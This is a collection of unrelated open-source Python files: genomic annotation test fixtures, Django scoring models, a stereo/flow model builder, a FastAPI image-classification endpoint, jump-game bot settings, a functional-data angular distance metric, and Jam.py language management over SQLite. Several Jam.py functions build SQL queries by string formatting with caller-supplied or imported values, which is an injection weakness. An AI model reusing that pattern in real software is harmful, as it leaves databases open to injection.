'five_prime_UTR_FBgn0031208:1_737':['FBtr0300689','FBtr0300690'],
'CDS_FBgn0031208:1_737':['FBtr0300689','FBtr0300690'],
'intron_FBgn0031208:1_FBgn0031208:2':['FBtr0300690'],
'intron_FBgn0031208:1_FBgn0031208:3':['FBtr0300689'],
'FBgn0031208:3':['FBtr0300689'],
'CDS_FBgn0031208:3_737':['FBtr0300689'],
'CDS_FBgn0031208:2_737':['FBtr0300690'],
'exon:chr2L:8193-8589:+':['FBtr0300690'],
'intron_FBgn0031208:2_FBgn0031208:4':['FBtr0300690'],
'three_prime_UTR_FBgn0031208:3_737':['FBtr0300689'],
'FBgn0031208:4':['FBtr0300690'],
'CDS_FBgn0031208:4_737':['FBtr0300690'],
'three_prime_UTR_FBgn0031208:4_737':['FBtr0300690'],
}
# and second-level . . . they should all be grandparents of the same gene.
GFF_parent_check_level_2 = {
'CG11023:1':['FBgn0031208'],
'five_prime_UTR_FBgn0031208:1_737':['FBgn0031208'],
'CDS_FBgn0031208:1_737':['FBgn0031208'],
'intron_FBgn0031208:1_FBgn0031208:2':['FBgn0031208'],
'intron_FBgn0031208:1_FBgn0031208:3':['FBgn0031208'],
'FBgn0031208:3':['FBgn0031208'],
'CDS_FBgn0031208:3_737':['FBgn0031208'],
'CDS_FBgn0031208:2_737':['FBgn0031208'],
'exon:chr2L:8193-8589:+':['FBgn0031208'],
'intron_FBgn0031208:2_FBgn0031208:4':['FBgn0031208'],
'three_prime_UTR_FBgn0031208:3_737':['FBgn0031208'],
'FBgn0031208:4':['FBgn0031208'],
'CDS_FBgn0031208:4_737':['FBgn0031208'],
'three_prime_UTR_FBgn0031208:4_737':['FBgn0031208'],
}
# Same thing for GTF test file . . .
GTF_parent_check_level_1 = {
'exon:chr2L:7529-8116:+':['FBtr0300689'],
'exon:chr2L:7529-8116:+_1':['FBtr0300690'],
'exon:chr2L:8193-9484:+':['FBtr0300689'],
'exon:chr2L:8193-8589:+':['FBtr0300690'],
'exon:chr2L:8668-9484:+':['FBtr0300690'],
'exon:chr2L:10000-11000:-':['transcript_Fk_gene_1'],
'exon:chr2L:11500-12500:-':['transcript_Fk_gene_2'],
'CDS:chr2L:7680-8116:+':['FBtr0300689'],
'CDS:chr2L:7680-8116:+_1':['FBtr0300690'],
'CDS:chr2L:8193-8610:+':['FBtr0300689'],
'CDS:chr2L:8193-8589:+':['FBtr0300690'],
'CDS:chr2L:8668-9276:+':['FBtr0300690'],
'CDS:chr2L:10000-11000:-':['transcript_Fk_gene_1'],
'FBtr0300689':['FBgn0031208'],
'FBtr0300690':['FBgn0031208'],
'transcript_Fk_gene_1':['Fk_gene_1'],
'transcript_Fk_gene_2':['Fk_gene_2'],
'start_codon:chr2L:7680-7682:+':['FBtr0300689'],
'start_codon:chr2L:7680-7682:+_1':['FBtr0300690'],
'start_codon:chr2L:10000-11002:-':['transcript_Fk_gene_1'],
'stop_codon:chr2L:8611-8613:+':['FBtr0300689'],
'stop_codon:chr2L:9277-9279:+':['FBtr0300690'],
'stop_codon:chr2L:11001-11003:-':['transcript_Fk_gene_1'],
}
GTF_parent_check_level_2 = {
'exon:chr2L:7529-8116:+':['FBgn0031208'],
'exon:chr2L:8193-9484:+':['FBgn0031208'],
'exon:chr2L:8193-8589:+':['FBgn0031208'],
'exon:chr2L:8668-9484:+':['FBgn0031208'],
'exon:chr2L:10000-11000:-':['Fk_gene_1'],
'exon:chr2L:11500-12500:-':['Fk_gene_2'],
'CDS:chr2L:7680-8116:+':['FBgn0031208'],
'CDS:chr2L:8193-8610:+':['FBgn0031208'],
'CDS:chr2L:8193-8589:+':['FBgn0031208'],
'CDS:chr2L:8668-9276:+':['FBgn0031208'],
'CDS:chr2L:10000-11000:-':['Fk_gene_1'],
'FBtr0300689':[],
'FBtr0300690':[],
'transcript_Fk_gene_1':[],
'transcript_Fk_gene_2':[],
'start_codon:chr2L:7680-7682:+':['FBgn0031208'],
'start_codon:chr2L:10000-11002:-':['Fk_gene_1'],
'stop_codon:chr2L:8611-8613:+':['FBgn0031208'],
'stop_codon:chr2L:9277-9279:+':['FBgn0031208'],
'stop_codon:chr2L:11001-11003:-':['Fk_gene_1'],
}
expected_feature_counts = {
'gff3':{'gene':3,
'mRNA':4,
'exon':6,
'CDS':5,
'five_prime_UTR':1,
'intron':3,
'pcr_product':1,
'protein':2,
'three_prime_UTR':2},
'gtf':{
#'gene':3,
# 'mRNA':4,
'CDS':6,
'exon':7,
'start_codon':3,
'stop_codon':3}
}
expected_features = {'gff3':['gene',
'mRNA',
'protein',
'five_prime_UTR',
'three_prime_UTR',
'pcr_product',
'CDS',
'exon',
'intron'],
'gtf':['gene',
'mRNA',
'CDS',
'exon',
'start_codon',
'stop_codon']}
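# A minimal sketch (assumed, not part of the original test data) of how these expected
# mappings might be checked against a gffutils.FeatureDB built from FBgn0031208.gff;
# `db` is a hypothetical database object supplied by the caller.
def check_first_order_parents(db, expected=GFF_parent_check_level_1):
    for child_id, parent_ids in expected.items():
        observed = sorted(f.id for f in db.parents(child_id, level=1))
        assert observed == sorted(parent_ids), child_id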
|
wouso/core/scoring/models.py
|
AlexandruGhergut/wouso
| 117 |
119003
|
import logging
from datetime import datetime
from django.db import models
from django.contrib.auth.models import User
from wouso.core.common import Item, CachedItem
from wouso.core.decorators import cached_method, drop_cache
from wouso.core.game import get_games
from wouso.core.game.models import Game
class Coin(CachedItem, models.Model):
""" Different scoring categories.
A special coin is 'points', since it is used for the ladder and levels.
"""
CACHE_PART = 'name'
name = models.CharField(max_length=100, unique=True)
# The coin owner module, or null if it is a core coin
owner = models.ForeignKey(Game, blank=True, null=True)
title = models.CharField(max_length=100)
# If True, coin values are forced to integers; otherwise floats are used.
integer = models.BooleanField(default=False, blank=True)
def is_core(self):
""" A coin is a core coin, if it doesn't have an owner """
return self.owner is None
def format_value(self, amount):
if self.integer:
return int(round(amount))
return amount
def __unicode__(self):
return self.title or self.name
class Formula(Item, models.Model):
""" Define the way coin amounts are given to the user, based
on keyword arguments formulas.
A formula is owned by a game, or by the system (set owner to None)
"""
name = models.CharField(max_length=100, unique=True)
expression = models.CharField(max_length=1000, default='')
owner = models.ForeignKey(Game, null=True, blank=True)
description = models.CharField(max_length=500, default='')
@classmethod
def get(cls, id_string, default_string=None):
""" Performs a get lookup on the Formula table, if no formula exists
with the first id_string, returns the formula with the default_string
id.
"""
if not default_string:
return super(Formula, cls).get(id_string)
try:
formula = Formula.objects.get(name=id_string)
except cls.DoesNotExist:
formula = super(Formula, cls).get(default_string)
return formula
return formula
class History(models.Model):
""" Scoring history keeps track of scoring events per user, saving
the details from source to amount.
"""
timestamp = models.DateTimeField(default=datetime.now, blank=True)
user = models.ForeignKey(User)
game = models.ForeignKey(Game, blank=True, null=True, default=None)
# reserved for future use/debugging
external_id = models.IntegerField(default=0, null=True, blank=True)
formula = models.ForeignKey(Formula, blank=True, null=True, default=None)
coin = models.ForeignKey(Coin)
amount = models.FloatField(default=0)
percents = models.IntegerField(default=100)
# group same kind of bonuses together, using the same formula
tag = models.CharField(max_length=64, blank=True, null=True)
@classmethod
def add(cls, user=None, game=None, **kwargs):
ret = History.objects.create(user=user, game=game, **kwargs)
drop_cache(cls._user_points, user=user)
drop_cache(cls._user_coins, user=user)
return ret
@classmethod
def user_coins(cls, user):
return cls._user_coins(user=user)
@classmethod
def user_points(cls, user):
return cls._user_points(user=user)
@staticmethod
@cached_method
def _user_coins(user):
""" Returns a dictionary of coins and amounts for a specific user. """
allcoins = Coin.objects.all()
coins = {}
for coin in allcoins:
hs = History.objects.filter(user=user, coin=coin).aggregate(total=models.Sum('amount'))
if hs['total'] is not None:
coins[coin.name] = coin.format_value(hs['total'])
else:
if coin.is_core():
coins[coin.name] = 0
return coins
@staticmethod
@cached_method
def _user_points(user):
""" :return: a list of (game, points) - distribution of points per source """
points = {}
for game in get_games() + [None]:
pp = History.user_points_from_game(user=user, game=game, zeros=False)
if pp:
if game:
points[game.get_instance().verbose_name] = pp
else:
points['wouso'] = pp
return points
@staticmethod
def user_points_from_game(user, game, zeros=True):
# FIXME: add test
game = game.get_instance() if game else game
hs = History.objects.filter(user=user, game=game)
pp = {}
if zeros:
for c in Coin.objects.all():
pp[c.name] = 0
for h in hs:
pp[h.coin.name] = pp.get(h.coin.name, 0) + h.amount
return pp
def delete(self, using=None):
cls = self.__class__
drop_cache(cls._user_points, self.user)
drop_cache(cls._user_coins, self.user)
super(History, self).delete(using=using)
def __unicode__(self):
return "{user} {date}-{formula}[{ext}]: {amount}{coin}".format(user=self.user, date=self.timestamp, formula=self.formula, ext=self.external_id, amount=self.amount, coin=self.coin)
|
dmb/modeling/__init__.py
|
jiaw-z/DenseMatchingBenchmark
| 160 |
119004
|
from .flow.models import _META_ARCHITECTURES as _FLOW_META_ARCHITECTURES
from .stereo.models import _META_ARCHITECTURES as _STEREO_META_ARCHITECTURES
_META_ARCHITECTURES = dict()
_META_ARCHITECTURES.update(_FLOW_META_ARCHITECTURES)
_META_ARCHITECTURES.update(_STEREO_META_ARCHITECTURES)
def build_model(cfg):
meta_arch = _META_ARCHITECTURES[cfg.model.meta_architecture]
return meta_arch(cfg)
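# A minimal usage sketch (assumed, not from the source file): DenseMatchingBenchmark
# configs are mmcv-style Config objects exposing a `model.meta_architecture` key; the
# config path below is hypothetical.
def build_from_config_file(path='configs/AcfNet/scene_flow_uniform.py'):
    from mmcv import Config  # assumed project dependency
    cfg = Config.fromfile(path)
    return build_model(cfg)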
|
application/main/routers/image_classifier.py
|
willuvbb/test_fastapi_template
| 128 |
119037
|
<gh_stars>100-1000
from fastapi import File, UploadFile
from fastapi.routing import APIRouter
from application.initializer import LoggerInstance
from application.main.services.image_classification_service import ImageClassificationService
from application.main.utility.manager.image_utils import BasicImageUtils
image_classification_service = ImageClassificationService()
router = APIRouter(prefix='/image-classify')
logger = LoggerInstance().get_logger(__name__)
@router.post("/")
async def image_classification(file: UploadFile = File(...)):
extension = file.filename.split(".")[-1].lower() in ("jpg", "jpeg", "png")
if not extension:
return "Image must be jpg or png format!"
logger.info('Image Classification')
image = await BasicImageUtils.read_image_file(await file.read(), filename=file.filename, cache=True)
image_category = await image_classification_service.classify(image)
return image_category
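# A minimal client-side sketch (assumed, not part of the original router): POST an image
# to the endpoint with `requests`. Host, port and the local file name are hypothetical.
if __name__ == "__main__":
    import requests

    with open("sample.jpg", "rb") as f:
        response = requests.post(
            "http://localhost:8000/image-classify/",
            files={"file": ("sample.jpg", f, "image/jpeg")},
        )
    print(response.json())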
|
jump_bot/jumpbot/settings.py
|
beatyou/wechat_jump_game
| 17,238 |
119056
|
# Wechat Jump Bot (iOS)
# ----------------------------------------------------------------------------
import os
CURRENT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_ROOT = os.path.dirname(CURRENT_DIR)
PROJECT_DIR = "jumpbot/"
# ----------------------------------------------------------------------------
# Screenshot
DATA_DIR = "data/"
IMAGE = "screen.png"
IMAGE_DIR = PROJECT_DIR + DATA_DIR + IMAGE
# ----------------------------------------------------------------------------
# mode: ['auto', 'manual']
MODE = "manual"
# ----------------------------------------------------------------------------
# Params
def get_bot_params(model="ip"):
bot_params = {
"TIME_COEFF": 2.,
"COORD_Y_START_SCAN": 200,
"PIECE_BASE_HEIGHT_HALF": 13,
"PIECE_BODY_WIDTH": 49,
"SWIPE_X1": 375,
"SWIPE_Y1": 1055,
"SWIPE_X2": 375,
"SWIPE_Y2": 1055
}
if model == "ip":
bot_params["TIME_COEFF"] = 2.
bot_params["COORD_Y_START_SCAN"] = 200
bot_params["PIECE_BASE_HEIGHT_HALF"] = 13
bot_params["PIECE_BODY_WIDTH"] = 49
bot_params["SWIPE_X1"] = 375
bot_params["SWIPE_Y1"] = 1055
bot_params["SWIPE_X2"] = 375
bot_params["SWIPE_Y2"] = 1055
elif model == "plus":
bot_params["TIME_COEFF"] = 1.2
bot_params["COORD_Y_START_SCAN"] = 300
bot_params["PIECE_BASE_HEIGHT_HALF"] = 20
bot_params["PIECE_BODY_WIDTH"] = 70
bot_params["SWIPE_X1"] = 320
bot_params["SWIPE_Y1"] = 410
bot_params["SWIPE_X2"] = 320
bot_params["SWIPE_Y2"] = 410
elif model == "ipx":
bot_params["TIME_COEFF"] = 1.31
bot_params["COORD_Y_START_SCAN"] = 170
bot_params["PIECE_BASE_HEIGHT_HALF"] = 23
bot_params["PIECE_BODY_WIDTH"] = 70
bot_params["SWIPE_X1"] = 320
bot_params["SWIPE_Y1"] = 410
bot_params["SWIPE_X2"] = 320
bot_params["SWIPE_Y2"] = 410
elif model == "se":
bot_params["TIME_COEFF"] = 2.3
bot_params["COORD_Y_START_SCAN"] = 190
bot_params["PIECE_BASE_HEIGHT_HALF"] = 12
bot_params["PIECE_BODY_WIDTH"] = 50
bot_params["SWIPE_X1"] = 375
bot_params["SWIPE_Y1"] = 1055
bot_params["SWIPE_X2"] = 375
bot_params["SWIPE_Y2"] = 1055
else:
print("ParamError: Unknown model type, model should be [ip, plus, ipx, se]")
return bot_params
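# A minimal usage sketch (assumed): fetch the tuned parameters for a given device model;
# "plus" is just an example key, and unknown keys fall back to the iPhone defaults above.
if __name__ == "__main__":
    params = get_bot_params(model="plus")
    print(params["TIME_COEFF"], params["SWIPE_Y1"])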
|
skfda/misc/metrics/_angular.py
|
jiduque/scikit-fda
| 147 |
119088
|
from __future__ import annotations
from typing import Optional, TypeVar, Union
import numpy as np
from typing_extensions import Final
from ...representation import FData
from ...representation._typing import NDArrayFloat
from .._math import cosine_similarity, cosine_similarity_matrix
from ._utils import pairwise_metric_optimization
T = TypeVar("T", bound=Union[NDArrayFloat, FData])
class AngularDistance():
r"""
Calculate the angular distance between two objects.
For each pair of observations x and y the angular distance between them is
defined as the normalized "angle" between them:
.. math::
d(x, y) = \frac{\arccos \left(\frac{\langle x, y \rangle}{
\sqrt{\langle x, x \rangle \langle y, y \rangle}} \right)}{\pi}
where :math:`\langle {}\cdot{}, {}\cdot{} \rangle` is the inner product.
This distance is defined in the interval [0, 1].
Args:
e1: First object.
e2: Second object.
Returns:
Numpy vector where the i-th coordinate has the angular distance between
the i-th element of the first object and the i-th element of the second
one.
Examples:
Computes the angular distances between an object containing functional
data for the functions y = 1 and y = x, defined over the interval
[0, 1], and another one containing data for the functions y = 2 and
y = cos(x). The result is an array of size 2 with the angular
distance between the functions in the same position in both objects.
>>> import skfda
>>> import numpy as np
>>>
>>> x = np.linspace(0, 1, 1001)
>>> fd = skfda.FDataGrid([np.ones(len(x)), x], x)
>>> fd2 = skfda.FDataGrid([2*np.ones(len(x)), np.cos(x)], x)
>>>
>>> skfda.misc.metrics.angular_distance(fd, fd2).round(2)
array([ 0. , 0.22])
"""
def __call__(
self,
e1: T,
e2: T,
) -> NDArrayFloat:
"""Compute the distance."""
return np.arccos(cosine_similarity(e1, e2)) / np.pi
def __repr__(self) -> str:
return (
f"{type(self).__name__}()"
)
angular_distance: Final = AngularDistance()
@pairwise_metric_optimization.register
def _pairwise_metric_optimization_angular(
metric: AngularDistance,
elem1: Union[NDArrayFloat, FData],
elem2: Optional[Union[NDArrayFloat, FData]],
) -> NDArrayFloat:
return np.arccos(cosine_similarity_matrix(elem1, elem2)) / np.pi
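# A minimal sketch (assumed usage, not taken from the library docs): the metric is also
# annotated for plain NDArrayFloat inputs, so row-wise vectors should work directly,
# assuming cosine_similarity treats each row as one observation.
if __name__ == "__main__":
    a = np.array([[1.0, 0.0], [1.0, 1.0]])
    b = np.array([[0.0, 1.0], [2.0, 2.0]])
    # Orthogonal rows give 0.5, parallel rows give 0.0.
    print(angular_distance(a, b))  # expected: [ 0.5  0. ]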
|
jam/langs.py
|
pubmania/jam-py
| 384 |
119111
|
import os
import sqlite3
import json
import datetime
from shutil import copyfile
from werkzeug._compat import iteritems, to_bytes, to_unicode
from jam.third_party.filelock import FileLock
import jam
LANG_FIELDS = ['id', 'f_name', 'f_language', 'f_country', 'f_abr', 'f_rtl']
LOCALE_FIELDS = [
'f_decimal_point', 'f_mon_decimal_point',
'f_mon_thousands_sep', 'f_currency_symbol', 'f_frac_digits', 'f_p_cs_precedes',
'f_n_cs_precedes', 'f_p_sep_by_space', 'f_n_sep_by_space', 'f_positive_sign',
'f_negative_sign', 'f_p_sign_posn', 'f_n_sign_posn', 'f_d_fmt', 'f_d_t_fmt'
]
FIELDS = LANG_FIELDS + LOCALE_FIELDS
def lang_con(task):
return sqlite3.connect(os.path.join(task.work_dir, 'langs.sqlite'))
def execute(task, sql, params=None):
result = None
con = lang_con(task)
try:
cursor = con.cursor()
if params:
cursor.execute(sql, params)
else:
cursor.execute(sql)
con.commit()
except Exception as e:
print(sql)
raise Exception(e)
finally:
con.close()
def select(task, sql):
result = None
con = lang_con(task)
try:
cursor = con.cursor()
cursor.execute(sql)
result = cursor.fetchall()
con.rollback()
except Exception as e:
print(sql)
raise Exception(e)
finally:
con.close()
return result
def copy_table(cursor, name):
cursor.execute('DROP TABLE IF EXISTS SYS_%s' % name)
cursor.execute("SELECT sql FROM LANGS.sqlite_master WHERE type='table' AND name='JAM_%s'" % name)
sql = cursor.fetchone()[0]
cursor.execute(sql.replace('JAM_%s' % name, 'SYS_%s' % name))
cursor.execute('INSERT INTO SYS_%s SELECT * FROM LANGS.JAM_%s' % (name, name))
def update_langs(task):
with task.lock('$langs'):
con = task.create_connection()
try:
cursor = con.cursor()
try:
cursor.execute('ALTER TABLE SYS_PARAMS ADD COLUMN F_JAM_VERSION TEXT')
except:
pass
cursor.execute('SELECT F_JAM_VERSION, F_LANGUAGE FROM SYS_PARAMS')
res = cursor.fetchall()
version = res[0][0]
language = res[0][1]
langs_path = os.path.join(task.work_dir, 'langs.sqlite')
if version != task.app.jam_version or not os.path.exists(langs_path):
# ~ task.log.info('Version changed!')
copyfile(os.path.join(os.path.dirname(jam.__file__), 'langs.sqlite'), langs_path)
os.chmod(os.path.join(task.work_dir, 'langs.sqlite'), 0o666)
cursor.execute('SELECT ID, F_NAME FROM SYS_LANGS')
langs = cursor.fetchall()
langs_list = []
langs_dict = {}
for l in langs:
langs_list.append(l[1])
langs_dict[l[1]] = l[0]
res = select(task, 'SELECT %s FROM JAM_LANGS ORDER BY ID' % ', '.join(FIELDS))
for r in res:
if langs_dict.get(r[1]):
del langs_dict[r[1]]
if not r[1] in langs_list:
fields = ['DELETED']
values = ['?']
field_values = [0]
for i, value in enumerate(r):
if i > 0:
fields.append(FIELDS[i])
values.append('?')
field_values.append(value)
sql = "INSERT INTO SYS_LANGS (%s) VALUES (%s)" % (','.join(fields), ','.join(values))
cursor.execute(sql, (field_values))
del_langs = list(langs_dict.values())
if len(del_langs):
if language in del_langs:
language = 1
sql = "DELETE FROM SYS_LANGS WHERE ID IN (%s)" % ','.join([str(d) for d in del_langs])
cursor.execute(sql)
if language is None:
language = 'NULL'
cursor.execute("UPDATE SYS_PARAMS SET F_JAM_VERSION='%s', F_LANGUAGE=%s" % (task.app.jam_version, language))
con.commit()
finally:
con.close()
def init_locale():
import locale
result = {}
try:
locale.setlocale(locale.LC_ALL, '')
loc = locale.localeconv()
for field in LOCALE_FIELDS:
setting = field[2:]
try:
result[field] = to_unicode(loc[setting], 'utf-8')
except:
result[field] = jam.common.DEFAULT_LOCALE[setting.upper()]
except:
pass
try:
result['f_d_fmt'] = locale.nl_langinfo(locale.D_FMT)
except:
result['f_d_fmt'] = '%Y-%m-%d'
result['f_d_t_fmt'] = '%s %s' % (result['f_d_fmt'], '%H:%M')
return result
def get_lang_dict(task, language):
res = select(task, '''
SELECT K.F_KEYWORD,
CASE WHEN TRIM(V1.F_VALUE) <> ''
THEN V1.F_VALUE
ELSE V2.F_VALUE
END
FROM JAM_LANG_KEYS AS K
LEFT OUTER JOIN JAM_LANG_VALUES AS V1 ON (K.ID = V1.F_KEY AND V1.F_LANG = %s)
LEFT OUTER JOIN JAM_LANG_VALUES AS V2 ON (K.ID = V2.F_KEY AND V2.F_LANG = %s)
''' % (language, 1))
result = {}
for key, value in res:
result[key] = value
return result
def get_locale_dict(task, language):
result = {}
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('SELECT %s FROM SYS_LANGS WHERE ID=%s' % (', '.join(LOCALE_FIELDS), language))
res = cursor.fetchall()
if len(res):
for i, field in enumerate(LOCALE_FIELDS):
result[field[2:].upper()] = res[0][i]
else:
raise Exception('Language with id %s is not found' % language)
con.rollback()
except:
result = jam.common.DEFAULT_LOCALE
finally:
con.close()
return result
def get_translation(task, lang1, lang2):
res = select(task, '''
SELECT K.ID, K.F_KEYWORD, V1.F_VALUE, V2.F_VALUE
FROM JAM_LANG_KEYS AS K
LEFT OUTER JOIN JAM_LANG_VALUES AS V1 ON (K.ID = V1.F_KEY AND V1.F_LANG = %s)
LEFT OUTER JOIN JAM_LANG_VALUES AS V2 ON (K.ID = V2.F_KEY AND V2.F_LANG = %s)
''' % (lang1, lang2))
return res
def add_lang(task, lang_id, language, country, name, abr, rtl, copy_lang):
con = lang_con(task)
try:
cursor = con.cursor()
locale = init_locale()
fields = []
values = []
field_values = []
for key, value in iteritems(locale):
fields.append(key)
values.append('?')
field_values.append(to_unicode(value, 'utf-8'))
cursor.execute("INSERT INTO JAM_LANGS (ID, F_LANGUAGE, F_COUNTRY, F_NAME, F_ABR, F_RTL, %s) VALUES (?,?,?,?,?,?,%s)" % (','.join(fields), ','.join(values)),
([lang_id, language, country, name, abr, rtl] + field_values))
if copy_lang:
cursor.execute('''
SELECT JAM_LANG_KEYS.ID, F_VALUE
FROM JAM_LANG_VALUES LEFT OUTER JOIN JAM_LANG_KEYS ON JAM_LANG_KEYS.ID = JAM_LANG_VALUES.F_KEY
WHERE F_LANG = %s
''' % copy_lang)
res = cursor.fetchall()
recs = []
for key_id, value in res:
recs.append((key_id, lang_id, value))
cursor.executemany("INSERT INTO JAM_LANG_VALUES(F_KEY, F_LANG, F_VALUE) VALUES (?,?,?)", recs)
con.commit()
langs = task.sys_langs.copy()
langs.set_where(id=lang_id)
langs.open()
if langs.record_count():
langs.edit()
for key, value in iteritems(locale):
langs.field_by_name(key).value = to_unicode(value, 'utf-8')
langs.post()
langs.apply()
finally:
con.close()
def save_lang_field(task, lang_id, field_name, value):
execute(task, 'UPDATE JAM_LANGS SET %s=? WHERE ID=%s' % (field_name, lang_id), (value,))
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('UPDATE SYS_LANGS SET %s=? WHERE ID=%s' % (field_name, lang_id), (value,))
con.commit()
finally:
con.close()
if task.language == lang_id:
task.update_lang(lang_id)
def save_translation(task, lang_id, key_id, value):
res = select(task, 'SELECT ID FROM JAM_LANG_VALUES WHERE F_LANG=%s AND F_KEY=%s' % (lang_id, key_id))
if len(res):
execute(task, 'UPDATE JAM_LANG_VALUES SET F_VALUE=? WHERE ID=%s' % (res[0][0]), (value,))
else:
execute(task, 'INSERT INTO JAM_LANG_VALUES (F_LANG, F_KEY, F_VALUE) VALUES (?, ?, ?)', (lang_id, key_id, value))
def add_key(task, key):
result = ''
con = lang_con(task)
try:
cursor = con.cursor()
cursor.execute("SELECT ID FROM JAM_LANG_KEYS WHERE F_KEYWORD='%s'" % key)
res = cursor.fetchall()
if len(res):
result = 'Keyword exists'
else:
cursor.execute('INSERT INTO JAM_LANG_KEYS (F_KEYWORD) VALUES (?)', (key,))
con.commit()
finally:
con.close()
return result
def del_key(task, key_id):
result = False
con = lang_con(task)
try:
cursor = con.cursor()
cursor.execute("DELETE FROM JAM_LANG_VALUES WHERE F_KEY=%s" % key_id)
cursor.execute("DELETE FROM JAM_LANG_KEYS WHERE ID=%s" % key_id)
con.commit()
result = True
finally:
con.close()
return result
def get_dict(task, language):
res = select(task, '''
SELECT JAM_LANG_KEYS.F_KEYWORD, F_VALUE
FROM JAM_LANG_VALUES LEFT OUTER JOIN JAM_LANG_KEYS ON JAM_LANG_KEYS.ID = JAM_LANG_VALUES.F_KEY
WHERE F_LANG = %s
''' % language)
result = {}
for key, value in res:
result[key] = value
return result
def export_lang(task, lang_id, host):
names = FIELDS[1:]
lang = select(task, 'SELECT %s FROM JAM_LANGS WHERE ID=%s' % (', '.join(names), lang_id))
if len(lang):
language = {}
for i in range(len(lang[0])):
language[names[i]] = lang[0][i]
translation = get_dict(task, lang_id)
content = json.dumps({'language': language, 'translation': translation})
name = language['f_name'].replace(' ', '_')
file_name = '%s_%s.lang' % (name, datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
return {'file_name': file_name, 'content': content}
def import_lang(task, file_path):
error = ''
try:
with open(file_path, 'r') as f:
content = to_unicode(f.read(), 'utf-8')
content = json.loads(content)
language = content['language']
translation = content['translation']
con = lang_con(task)
sys_con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('SELECT ID FROM JAM_LANGS WHERE F_LANGUAGE=%s AND F_COUNTRY=%s' % (language['f_language'], language['f_country']))
res = cursor.fetchall()
if len(res):
lang_id = res[0][0]
fields = []
field_values = []
for key, value in iteritems(language):
fields.append('%s=?' % key)
field_values.append(value)
fields = ','.join(fields)
cursor.execute("UPDATE JAM_LANGS SET %s WHERE ID=%s" % (fields, lang_id), field_values)
sys_cursor = sys_con.cursor()
sys_cursor.execute("UPDATE SYS_LANGS SET %s WHERE ID=%s" % (fields, lang_id), field_values)
sys_con.commit()
else:
fields = []
values = []
field_values = []
for key, value in iteritems(language):
fields.append(key)
field_values.append(value)
values.append('?')
cursor.execute('INSERT INTO JAM_LANGS (%s) VALUES (%s)' % (','.join(fields), ','.join(values)), field_values)
cursor.execute('SELECT ID FROM JAM_LANGS WHERE F_LANGUAGE=%s AND F_COUNTRY=%s' % (language['f_language'], language['f_country']))
res = cursor.fetchall()
lang_id = res[0][0]
fields.append('DELETED')
values.append('?')
field_values.append(0)
sys_cursor = sys_con.cursor()
sys_cursor.execute('INSERT INTO SYS_LANGS (%s) VALUES (%s)' % (','.join(fields), ','.join(values)), field_values)
sys_con.commit()
if lang_id:
cursor.execute('SELECT ID, F_KEYWORD FROM JAM_LANG_KEYS')
res = cursor.fetchall()
keys = {}
for r in res:
keys[r[1]] = r[0]
recs = []
for keyword, value in iteritems(translation):
key_id = keys.get(keyword)
if key_id:
cursor.execute('SELECT ID FROM JAM_LANG_VALUES WHERE F_LANG=%s AND F_KEY=%s' % (lang_id, key_id))
res = cursor.fetchall()
if len(res):
cursor.execute('UPDATE JAM_LANG_VALUES SET F_VALUE=? WHERE ID=%s' % (res[0][0]), (value,))
else:
cursor.execute('INSERT INTO JAM_LANG_VALUES (F_LANG, F_KEY, F_VALUE) VALUES (?, ?, ?)', (lang_id, key_id, value))
con.commit()
finally:
con.close()
sys_con.close()
except Exception as e:
print(e)
error = 'Cannot import language'
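# A minimal usage sketch (assumed, not part of the original module): `task` is the Jam
# admin task object (it must provide work_dir and create_connection()); the language id
# and output path are hypothetical.
def dump_language(task, lang_id=1, path='lang_export.json'):
    exported = export_lang(task, lang_id, host=None)
    if exported:
        with open(path, 'w') as f:
            f.write(exported['content'])
    return exported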
|